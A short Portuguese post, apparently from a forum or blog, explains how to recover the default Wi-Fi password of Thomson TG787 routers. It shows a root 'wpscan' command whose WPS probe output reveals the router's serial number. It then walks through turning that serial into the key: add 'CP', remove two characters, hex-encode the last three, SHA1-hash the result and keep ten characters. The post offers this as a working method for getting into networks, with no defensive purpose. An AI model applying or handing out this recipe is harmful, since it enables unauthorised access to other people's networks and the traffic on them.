A vulnerabilidade vem acompanhada com a mais recente falha descoberta no protocolo WPS. O problema é que o router envia demasiada informação ao cliente (Exemplo: marca,modelo,numero de serie, etc).
Apesar de não se conseguir usar o nome da rede (ESSID) para calcular as chaves, é possivel usar o Numero de Serie com o método antigo.
Exemplo:
root@bt~#:wpscan -i mon0 BSSID: 01:23:45:11:22:33 ESSID: Thomson112233 ---------------------------------------------------------- Version : 0x10 WPS State : 0x02 Response Type : 0x03 UUID-E : 0xcx1x1xex8xfxfx0x8xax7x0xdxdx4x2x Manufacturer : THOMSON Model Name : Thomson TG Model Number : 787 Serial Number : 1011TSABC Primary Device Type : 0x0123456789012345 Device Name : Thomson TG787 Config Methods : 0x0001 RF Bands : 0x00
Pegamos no numero de serie (Serial Number):
1011TSABC
Acrescentamos CP e removemos a 5º e 6º letra, neste cado TS e ficamos com:
CP1011ABC
Convertemos os últimos 3 caracteres para Hexadecimal (HEX) e colocamos as letras em minúsculas (neste caso não tem):
CP1011414243
Por último encriptamos tudo com SHA1:
8d6bea96fc2eb7b52020c45492e379cab1940d89
Os primeiros 10 caracteres em maiúsculas serão a password:
8D6BEA96FC
A que salientar que não funciona nos novos modelos 784n nem nas redes MEO-XXXXXX